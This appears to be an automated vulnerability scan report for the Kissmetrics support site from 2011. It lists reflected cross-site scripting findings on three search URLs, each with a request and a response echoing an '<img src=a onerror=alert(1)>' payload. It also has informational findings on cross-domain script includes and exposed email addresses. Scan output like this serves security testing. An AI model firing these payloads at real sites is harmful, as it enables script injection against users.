1. Cross-site scripting (reflected)
1.1. http://support.kissmetrics.com/search/a [REST URL parameter 2]
1.2. http://support.kissmetrics.com/search/cookie [REST URL parameter 2]
1.3. http://support.kissmetrics.com/search/xss [REST URL parameter 2]
2. Cross-domain script include
2.1. http://support.kissmetrics.com/
2.2. http://support.kissmetrics.com/advanced/a-b-testing
2.3. http://support.kissmetrics.com/advanced/server-client-side-integration
2.4. http://support.kissmetrics.com/apis
2.5. http://support.kissmetrics.com/apis/common-methods
2.6. http://support.kissmetrics.com/apis/javascript
2.7. http://support.kissmetrics.com/apis/url
2.8. http://support.kissmetrics.com/getting-started/people-events-properties
2.9. http://support.kissmetrics.com/getting-started/products-reports
2.10. http://support.kissmetrics.com/getting-started/saas_basics
2.11. http://support.kissmetrics.com/misc/api-key
2.12. http://support.kissmetrics.com/misc/javascript-settings
2.13. http://support.kissmetrics.com/misc/site-settings
2.14. http://support.kissmetrics.com/misc/user-privacy
2.15. http://support.kissmetrics.com/overview/how-is-kissmetrics-different
2.16. http://support.kissmetrics.com/search/a
2.17. http://support.kissmetrics.com/search/cookie
2.18. http://support.kissmetrics.com/search/xss
3.1. http://support.kissmetrics.com/
3.2. http://support.kissmetrics.com/advanced/a-b-testing
3.3. http://support.kissmetrics.com/advanced/server-client-side-integration
3.4. http://support.kissmetrics.com/apis
3.5. http://support.kissmetrics.com/apis/common-methods
3.6. http://support.kissmetrics.com/apis/javascript
3.7. http://support.kissmetrics.com/apis/url
3.8. http://support.kissmetrics.com/css/screen.css
3.9. http://support.kissmetrics.com/getting-started/people-events-properties
3.10. http://support.kissmetrics.com/getting-started/products-reports
3.11. http://support.kissmetrics.com/getting-started/saas_basics
3.12. http://support.kissmetrics.com/misc/api-key
3.13. http://support.kissmetrics.com/misc/javascript-settings
3.14. http://support.kissmetrics.com/misc/site-settings
3.15. http://support.kissmetrics.com/misc/user-privacy
3.16. http://support.kissmetrics.com/overview/how-is-kissmetrics-different
3.17. http://support.kissmetrics.com/search/a
3.18. http://support.kissmetrics.com/search/cookie
3.19. http://support.kissmetrics.com/search/xss
Severity: | High |
Confidence: | Certain |
Host: | http://support.kissm |
Path: | /search/a |
GET /search/a17667<img%20src%3da Host: support.kissmetrics.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://support.kissm |
HTTP/1.1 200 OK Content-Type: text/html Date: Sun, 28 Aug 2011 20:50:01 GMT Server: nginx Vary: Accept-Encoding Content-Length: 7022 Connection: keep-alive <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html lang='en' xml:lang='en' xmlns='http://www.w3.org <head> ...[SNIP]... <h2> Found 0 result(s) for ' a17667<img src=a onerror=alert(1) ' </h2> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://support.kissm |
Path: | /search/cookie |
GET /search/cookie9d6c0<img%20src%3da Host: support.kissmetrics.com Proxy-Connection: keep-alive Referer: http://support.kissm User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.215 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: km_ai=Dh3cuYrwfedK4c |
HTTP/1.1 200 OK Content-Type: text/html Date: Sun, 28 Aug 2011 20:42:47 GMT Server: nginx Vary: Accept-Encoding Connection: keep-alive Content-Length: 7037 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html lang='en' xml:lang='en' xmlns='http://www.w3.org <head> ...[SNIP]... <h2> Found 0 result(s) for ' cookie9d6c0<img src=a onerror=alert(1) ' </h2> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://support.kissm |
Path: | /search/xss |
GET /search/xsse67be<img%20src%3da Host: support.kissmetrics.com Proxy-Connection: keep-alive Referer: http://support.kissm User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.215 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: km_ai=Dh3cuYrwfedK4c |
HTTP/1.1 200 OK Content-Type: text/html Date: Sun, 28 Aug 2011 20:42:33 GMT Server: nginx Vary: Accept-Encoding Content-Length: 7028 Connection: keep-alive <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html lang='en' xml:lang='en' xmlns='http://www.w3.org <head> ...[SNIP]... <h2> Found 0 result(s) for ' xsse67be<img src=a onerror=alert(1) ' </h2> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://support.kissm |
Path: | / |
GET / HTTP/1.1 Host: support.kissmetrics.com Proxy-Connection: keep-alive Referer: http://www.kissmetrics User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.215 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: km_ai=Dh3cuYrwfedK4c |
HTTP/1.1 200 OK Content-Type: text/html Date: Sun, 28 Aug 2011 18:30:23 GMT Last-Modified: Fri, 26 Aug 2011 22:46:17 GMT Server: nginx Vary: Accept-Encoding Content-Length: 10133 Connection: keep-alive <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html lang='en' xml:lang='en' xmlns='http://www.w3.org <head> ...[SNIP]... </div> <script charset='utf-8' src='//ajax.googleapis ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://support.kissm |
Path: | /advanced/a-b-testing |
GET /advanced/a-b-testing HTTP/1.1 Host: support.kissmetrics.com Proxy-Connection: keep-alive Referer: http://support.kissm User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.215 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: km_ai=Dh3cuYrwfedK4c |
HTTP/1.1 200 OK Content-Type: text/html Date: Sun, 28 Aug 2011 20:40:20 GMT Last-Modified: Sat, 27 Aug 2011 00:00:37 GMT Server: nginx Vary: Accept-Encoding Content-Length: 10539 Connection: keep-alive <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html lang='en' xml:lang='en' xmlns='http://www.w3.org <head> ...[SNIP]... </div> <script charset='utf-8' src='//ajax.googleapis ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://support.kissm |
Path: | /advanced/server-client |
GET /advanced/server-client Host: support.kissmetrics.com Proxy-Connection: keep-alive Referer: http://support.kissm User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.215 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: km_ai=Dh3cuYrwfedK4c |
HTTP/1.1 200 OK Content-Type: text/html Date: Sun, 28 Aug 2011 20:39:59 GMT Last-Modified: Sat, 27 Aug 2011 17:25:19 GMT Server: nginx Vary: Accept-Encoding Content-Length: 8273 Connection: keep-alive <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html lang='en' xml:lang='en' xmlns='http://www.w3.org <head> ...[SNIP]... </div> <script charset='utf-8' src='//ajax.googleapis ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://support.kissm |
Path: | /apis |
GET /apis HTTP/1.1 Host: support.kissmetrics.com Proxy-Connection: keep-alive Referer: http://support.kissm User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.215 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: km_ai=Dh3cuYrwfedK4c |
HTTP/1.1 200 OK Content-Type: text/html Date: Sun, 28 Aug 2011 20:41:01 GMT Last-Modified: Sat, 27 Aug 2011 01:52:58 GMT Server: nginx Vary: Accept-Encoding Content-Length: 11348 Connection: keep-alive <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html lang='en' xml:lang='en' xmlns='http://www.w3.org <head> ...[SNIP]... </div> <script charset='utf-8' src='//ajax.googleapis ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://support.kissm |
Path: | /apis/common-methods |
GET /apis/common-methods HTTP/1.1 Host: support.kissmetrics.com Proxy-Connection: keep-alive Referer: http://support.kissm User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.215 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: km_ai=Dh3cuYrwfedK4c |
HTTP/1.1 200 OK Content-Type: text/html Date: Sun, 28 Aug 2011 20:41:10 GMT Last-Modified: Sat, 27 Aug 2011 02:39:25 GMT Server: nginx Vary: Accept-Encoding Content-Length: 13114 Connection: keep-alive <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html lang='en' xml:lang='en' xmlns='http://www.w3.org <head> ...[SNIP]... </div> <script charset='utf-8' src='//ajax.googleapis ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://support.kissm |
Path: | /apis/javascript |
GET /apis/javascript HTTP/1.1 Host: support.kissmetrics.com Proxy-Connection: keep-alive Referer: http://support.kissm User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.215 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: km_ai=Dh3cuYrwfedK4c |
HTTP/1.1 200 OK Content-Type: text/html Date: Sun, 28 Aug 2011 20:40:08 GMT Last-Modified: Fri, 26 Aug 2011 22:36:27 GMT Server: nginx Vary: Accept-Encoding Content-Length: 8199 Connection: keep-alive <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html lang='en' xml:lang='en' xmlns='http://www.w3.org <head> ...[SNIP]... </div> <script charset='utf-8' src='//ajax.googleapis ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://support.kissm |
Path: | /apis/url |
GET /apis/url HTTP/1.1 Host: support.kissmetrics.com Proxy-Connection: keep-alive Referer: http://support.kissm User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.215 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: km_ai=Dh3cuYrwfedK4c |
HTTP/1.1 200 OK Content-Type: text/html Date: Sun, 28 Aug 2011 20:41:24 GMT Last-Modified: Sat, 27 Aug 2011 08:10:02 GMT Server: nginx Vary: Accept-Encoding Content-Length: 10709 Connection: keep-alive <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html lang='en' xml:lang='en' xmlns='http://www.w3.org <head> ...[SNIP]... </div> <script charset='utf-8' src='//ajax.googleapis ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://support.kissm |
Path: | /getting-started/people |
GET /getting-started/people Host: support.kissmetrics.com Proxy-Connection: keep-alive Referer: http://support.kissm User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.215 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: km_ai=Dh3cuYrwfedK4c |
HTTP/1.1 200 OK Content-Type: text/html Date: Sun, 28 Aug 2011 20:41:18 GMT Last-Modified: Sat, 27 Aug 2011 02:09:54 GMT Server: nginx Vary: Accept-Encoding Content-Length: 13923 Connection: keep-alive <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html lang='en' xml:lang='en' xmlns='http://www.w3.org <head> ...[SNIP]... </div> <script charset='utf-8' src='//ajax.googleapis ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://support.kissm |
Path: | /getting-started/products |
GET /getting-started/products Host: support.kissmetrics.com Proxy-Connection: keep-alive Referer: http://support.kissm User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.215 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: km_ai=Dh3cuYrwfedK4c |
HTTP/1.1 200 OK Content-Type: text/html Date: Sun, 28 Aug 2011 20:40:41 GMT Last-Modified: Sat, 27 Aug 2011 01:49:14 GMT Server: nginx Vary: Accept-Encoding Content-Length: 8059 Connection: keep-alive <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html lang='en' xml:lang='en' xmlns='http://www.w3.org <head> ...[SNIP]... </div> <script charset='utf-8' src='//ajax.googleapis ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://support.kissm |
Path: | /getting-started/saas |
GET /getting-started/saas Host: support.kissmetrics.com Proxy-Connection: keep-alive Referer: http://support.kissm User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.215 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: km_ai=Dh3cuYrwfedK4c |
HTTP/1.1 200 OK Content-Type: text/html Date: Sun, 28 Aug 2011 20:40:36 GMT Last-Modified: Sat, 27 Aug 2011 17:09:17 GMT Server: nginx Vary: Accept-Encoding Content-Length: 12294 Connection: keep-alive <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html lang='en' xml:lang='en' xmlns='http://www.w3.org <head> ...[SNIP]... </div> <script charset='utf-8' src='//ajax.googleapis ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://support.kissm |
Path: | /misc/api-key |
GET /misc/api-key HTTP/1.1 Host: support.kissmetrics.com Proxy-Connection: keep-alive Referer: http://support.kissm User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.215 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: km_ai=Dh3cuYrwfedK4c |
HTTP/1.1 200 OK Content-Type: text/html Date: Sun, 28 Aug 2011 20:40:56 GMT Last-Modified: Sun, 28 Aug 2011 00:15:31 GMT Server: nginx Vary: Accept-Encoding Content-Length: 7132 Connection: keep-alive <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html lang='en' xml:lang='en' xmlns='http://www.w3.org <head> ...[SNIP]... </div> <script charset='utf-8' src='//ajax.googleapis ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://support.kissm |
Path: | /misc/javascript-settings |
GET /misc/javascript-settings HTTP/1.1 Host: support.kissmetrics.com Proxy-Connection: keep-alive Referer: http://support.kissm User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.215 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: km_ai=Dh3cuYrwfedK4c |
HTTP/1.1 200 OK Content-Type: text/html Date: Sun, 28 Aug 2011 20:39:00 GMT Last-Modified: Sun, 28 Aug 2011 09:24:48 GMT Server: nginx Vary: Accept-Encoding Content-Length: 7228 Connection: keep-alive <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html lang='en' xml:lang='en' xmlns='http://www.w3.org <head> ...[SNIP]... </div> <script charset='utf-8' src='//ajax.googleapis ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://support.kissm |
Path: | /misc/site-settings |
GET /misc/site-settings HTTP/1.1 Host: support.kissmetrics.com Proxy-Connection: keep-alive Referer: http://support.kissm User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.215 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: km_ai=Dh3cuYrwfedK4c |
HTTP/1.1 200 OK Content-Type: text/html Date: Sun, 28 Aug 2011 20:39:10 GMT Last-Modified: Sat, 27 Aug 2011 05:09:35 GMT Server: nginx Vary: Accept-Encoding Content-Length: 7682 Connection: keep-alive <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html lang='en' xml:lang='en' xmlns='http://www.w3.org <head> ...[SNIP]... </div> <script charset='utf-8' src='//ajax.googleapis ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://support.kissm |
Path: | /misc/user-privacy |
GET /misc/user-privacy HTTP/1.1 Host: support.kissmetrics.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.215 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: km_ai=Dh3cuYrwfedK4c |
HTTP/1.1 200 OK Content-Type: text/html Date: Sun, 28 Aug 2011 20:38:45 GMT Last-Modified: Sat, 27 Aug 2011 01:49:41 GMT Server: nginx Vary: Accept-Encoding Content-Length: 9978 Connection: keep-alive <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html lang='en' xml:lang='en' xmlns='http://www.w3.org <head> ...[SNIP]... </div> <script charset='utf-8' src='//ajax.googleapis ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://support.kissm |
Path: | /overview/how-is |
GET /overview/how-is Host: support.kissmetrics.com Proxy-Connection: keep-alive Referer: http://support.kissm User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.215 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: km_ai=Dh3cuYrwfedK4c |
HTTP/1.1 200 OK Content-Type: text/html Date: Sun, 28 Aug 2011 20:39:25 GMT Last-Modified: Sat, 27 Aug 2011 00:20:40 GMT Server: nginx Vary: Accept-Encoding Content-Length: 8931 Connection: keep-alive <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html lang='en' xml:lang='en' xmlns='http://www.w3.org <head> ...[SNIP]... </div> <script charset='utf-8' src='//ajax.googleapis ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://support.kissm |
Path: | /search/a |
GET /search/a HTTP/1.1 Host: support.kissmetrics.com Proxy-Connection: keep-alive Referer: http://support.kissm User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.215 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: km_ai=Dh3cuYrwfedK4c |
HTTP/1.1 200 OK Content-Type: text/html Date: Sun, 28 Aug 2011 20:48:31 GMT Last-Modified: Sun, 28 Aug 2011 20:48:30 GMT Server: nginx Vary: Accept-Encoding Content-Length: 14708 Connection: keep-alive <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html lang='en' xml:lang='en' xmlns='http://www.w3.org <head> ...[SNIP]... </div> <script charset='utf-8' src='//ajax.googleapis ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://support.kissm |
Path: | /search/cookie |
GET /search/cookie HTTP/1.1 Host: support.kissmetrics.com Proxy-Connection: keep-alive Referer: http://support.kissm User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.215 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: km_ai=Dh3cuYrwfedK4c |
HTTP/1.1 200 OK Content-Type: text/html Date: Sun, 28 Aug 2011 20:39:53 GMT Last-Modified: Sun, 28 Aug 2011 20:39:51 GMT Server: nginx Vary: Accept-Encoding Content-Length: 12570 Connection: keep-alive <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html lang='en' xml:lang='en' xmlns='http://www.w3.org <head> ...[SNIP]... </div> <script charset='utf-8' src='//ajax.googleapis ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://support.kissm |
Path: | /search/xss |
GET /search/xss HTTP/1.1 Host: support.kissmetrics.com Proxy-Connection: keep-alive Referer: http://support.kissm User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.215 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: km_ai=Dh3cuYrwfedK4c |
HTTP/1.1 200 OK Content-Type: text/html Date: Sun, 28 Aug 2011 20:39:42 GMT Last-Modified: Sun, 28 Aug 2011 20:39:41 GMT Server: nginx Vary: Accept-Encoding Content-Length: 6890 Connection: keep-alive <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html lang='en' xml:lang='en' xmlns='http://www.w3.org <head> ...[SNIP]... </div> <script charset='utf-8' src='//ajax.googleapis ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://support.kissm |
Path: | / |
GET / HTTP/1.1 Host: support.kissmetrics.com Proxy-Connection: keep-alive Referer: http://www.kissmetrics User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.215 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: km_ai=Dh3cuYrwfedK4c |
HTTP/1.1 200 OK Content-Type: text/html Date: Sun, 28 Aug 2011 18:30:23 GMT Last-Modified: Fri, 26 Aug 2011 22:46:17 GMT Server: nginx Vary: Accept-Encoding Content-Length: 10133 Connection: keep-alive <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html lang='en' xml:lang='en' xmlns='http://www.w3.org <head> ...[SNIP]... <a href='mailto:support@kissmetrics.com'> ...[SNIP]... <a href='mailto: support@kissmetrics.com'>support@kissmetrics.com</a> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://support.kissm |
Path: | /advanced/a-b-testing |
GET /advanced/a-b-testing HTTP/1.1 Host: support.kissmetrics.com Proxy-Connection: keep-alive Referer: http://support.kissm User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.215 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: km_ai=Dh3cuYrwfedK4c |
HTTP/1.1 200 OK Content-Type: text/html Date: Sun, 28 Aug 2011 20:40:20 GMT Last-Modified: Sat, 27 Aug 2011 00:00:37 GMT Server: nginx Vary: Accept-Encoding Content-Length: 10539 Connection: keep-alive <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html lang='en' xml:lang='en' xmlns='http://www.w3.org <head> ...[SNIP]... <a href='mailto: support@kissmetrics.com'>support@kissmetrics.com</a> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://support.kissm |
Path: | /advanced/server-client |
GET /advanced/server-client Host: support.kissmetrics.com Proxy-Connection: keep-alive Referer: http://support.kissm User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.215 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: km_ai=Dh3cuYrwfedK4c |
HTTP/1.1 200 OK Content-Type: text/html Date: Sun, 28 Aug 2011 20:39:59 GMT Last-Modified: Sat, 27 Aug 2011 17:25:19 GMT Server: nginx Vary: Accept-Encoding Content-Length: 8273 Connection: keep-alive <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html lang='en' xml:lang='en' xmlns='http://www.w3.org <head> ...[SNIP]... <a href='mailto: support@kissmetrics.com'>support@kissmetrics.com</a> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://support.kissm |
Path: | /apis |
GET /apis HTTP/1.1 Host: support.kissmetrics.com Proxy-Connection: keep-alive Referer: http://support.kissm User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.215 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: km_ai=Dh3cuYrwfedK4c |
HTTP/1.1 200 OK Content-Type: text/html Date: Sun, 28 Aug 2011 20:41:01 GMT Last-Modified: Sat, 27 Aug 2011 01:52:58 GMT Server: nginx Vary: Accept-Encoding Content-Length: 11348 Connection: keep-alive <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html lang='en' xml:lang='en' xmlns='http://www.w3.org <head> ...[SNIP]... <a href='mailto: support@kissmetrics.com'>support@kissmetrics.com</a> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://support.kissm |
Path: | /apis/common-methods |
GET /apis/common-methods HTTP/1.1 Host: support.kissmetrics.com Proxy-Connection: keep-alive Referer: http://support.kissm User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.215 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: km_ai=Dh3cuYrwfedK4c |
HTTP/1.1 200 OK Content-Type: text/html Date: Sun, 28 Aug 2011 20:41:10 GMT Last-Modified: Sat, 27 Aug 2011 02:39:25 GMT Server: nginx Vary: Accept-Encoding Content-Length: 13114 Connection: keep-alive <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html lang='en' xml:lang='en' xmlns='http://www.w3.org <head> ...[SNIP]... <code>bob@bob.com</code> ...[SNIP]... <code>bob@bob.com</code> ...[SNIP]... <code>_kmq.push([' ...[SNIP]... <code>KM::identify('bob@bob.com');
KM::record ...[SNIP]... <code>KM.identify('bob@bob.com');
KM.record( ...[SNIP]... <code>KM.identify('bob@bob.com');
KM.record( ...[SNIP]... <a href='mailto: support@kissmetrics.com'>support@kissmetrics.com</a> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://support.kissm |
Path: | /apis/javascript |
